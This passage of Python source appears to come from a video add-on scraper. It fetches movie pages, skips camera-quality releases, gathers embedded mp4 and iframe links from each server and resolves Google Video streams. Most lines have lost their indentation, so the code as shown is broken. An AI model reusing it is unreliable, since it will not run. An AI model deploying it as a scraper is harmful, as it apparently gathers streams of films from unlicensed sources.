u = urlparse.urljoin(self.base_link, self.include_link)
r = client.request(u).splitlines()
r = [re.findall('(.+?) (?:\(|)(\d{4})(?:\)|)$', i.strip()) for i in r]
r = [(cleantitle.get(i[0][0]), i[0][1]) for i in r if len(i) > 0]
return r
except:
return
def sources(self, url, hostDict, hostprDict):
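        # Collect playable links: skip CAM/TS/TC releases, fetch each server's embed page, and resolve Google Video streams.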
try:
sources = []
            if url is None: return sources
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
quality = client.parseDOM(r, 'h3', attrs = {'title': 'Quality.+?'})[0]
quality = client.parseDOM(quality, 'span')[0]
if quality.lower() in ['ts', 'tc', 'cam']: raise Exception()
url = client.parseDOM(r, 'a', ret='href')
url = [i for i in url if '-full-movie-' in i][0]
r = client.request(url)
headers = {'X-Requested-With': 'XMLHttpRequest', 'Referer': url}
servers = client.parseDOM(r, 'span', ret='link', attrs = {'class': '[^"]*btn-eps(?:\s+|)'})
for server in servers:
try:
url = '/demo.php?v=%s' % server
url = urlparse.urljoin(self.base_link, url)
r += str(client.request(url, headers=headers))
except:
pass
links = client.parseDOM(r, 'source', ret='src', attrs = {'type': 'video/mp4'})
links += client.parseDOM(r, 'iframe', ret='src')
for link in links:
try:
if not link.startswith('http'): link = urlparse.urljoin(self.base_link, link)
url = client.request(link, output='geturl')
quality = directstream.googletag(url)[0]['quality']
sources.append({'source': 'gvideo', 'quality': quality, 'provider': 'MFree', 'url': url, 'direct': True, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
try:
url = client.request(url, output='geturl')
if 'requiressl=yes' in url: url = url.replace('http://', 'https://')
else: url = url.replace('https://', 'http://')
return url
except:
return
|